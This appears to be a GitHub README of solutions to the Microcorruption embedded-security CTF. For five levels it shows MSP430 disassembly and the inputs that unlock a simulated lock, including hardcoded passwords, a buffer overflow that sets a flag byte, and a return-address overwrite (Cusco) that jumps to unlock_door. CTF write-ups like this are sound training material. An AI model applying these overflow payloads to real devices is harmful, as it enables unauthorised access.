|
||
---|---|---|
LICENSE | ||
README.md |
README.md
microcorruption
My solutions to the fantastic Microcorruption exercises.
Tutorial
Code that compares the password to the expected length of 8 characters.
4484: 6e4f mov.b @r15, r14
4486: 1f53 inc r15
4488: 1c53 inc r12
448a: 0e93 tst r14
448c: fb23 jnz $-0x8 <check_password+0x0>
448e: 3c90 0900 cmp #0x9, r12
4492: 0224 jz $+0x6 <check_password+0x14>
Any eight characters input is valid, for example:
password
New Orleans
Password is hardcoded and located at address 0x2400.
2400: 764f 7050 6e4b 5300 0000 0000 0000 0000 vOpPnKS.
Solution:
vOpPnKS
Sydney
The password is hardcoded in the check_password
routine:
448a <check_password>
448a: bf90 4f78 0000 cmp #0x784f, 0x0(r15)
4490: 0d20 jnz $+0x1c <check_password+0x22>
4492: bf90 3b77 0200 cmp #0x773b, 0x2(r15)
4498: 0920 jnz $+0x14 <check_password+0x22>
449a: bf90 2b74 0400 cmp #0x742b, 0x4(r15)
44a0: 0520 jnz $+0xc <check_password+0x22>
44a2: 1e43 mov #0x1, r14
44a4: bf90 5d2f 0600 cmp #0x2f5d, 0x6(r15)
44aa: 0124 jz $+0x4 <check_password+0x24>
Solution (hex, byte ordering is little endian):
4f783b772b745d2f
ASCII equivalent:
Ox;w+t]/
Hanoi
The input password does not matter. Instead, there is a hardcoded comparison of 0xb with the value at 0x2410.
4552: 3f40 d344 mov #0x44d3 "Testing if password is valid.", r15
4556: b012 de45 call #0x45de <puts>
455a: f290 0b00 1024 cmp.b #0xb, &0x2410
4560: 0720 jnz $+0x10 <login+0x50>
4562: 3f40 f144 mov #0x44f1 "Access granted.", r15
4566: b012 de45 call #0x45de <puts>
456a: b012 4844 call #0x4448 <unlock_door>
The input password is stored at 0x2400, so we can input a long enough string to set 0x2410 to 0xb. Solution in hex:
16 bytes from 0x2400 to 0x240f
\
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb0b
--
set 0x2410 to 0xb /
Cusco
At the end of the login
function the stackpointer points to 0x43fe. The input
password is allocated to 0x43ee. That means we can override the return address
at 0x43fe with the address of the unlock_door
door function at 0x4446.
Solution in hex:
16 bytes from 0x43ee to 0x43fe
\
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb4644
----
/
set 0x43fe to 0x4644 (unlock_door)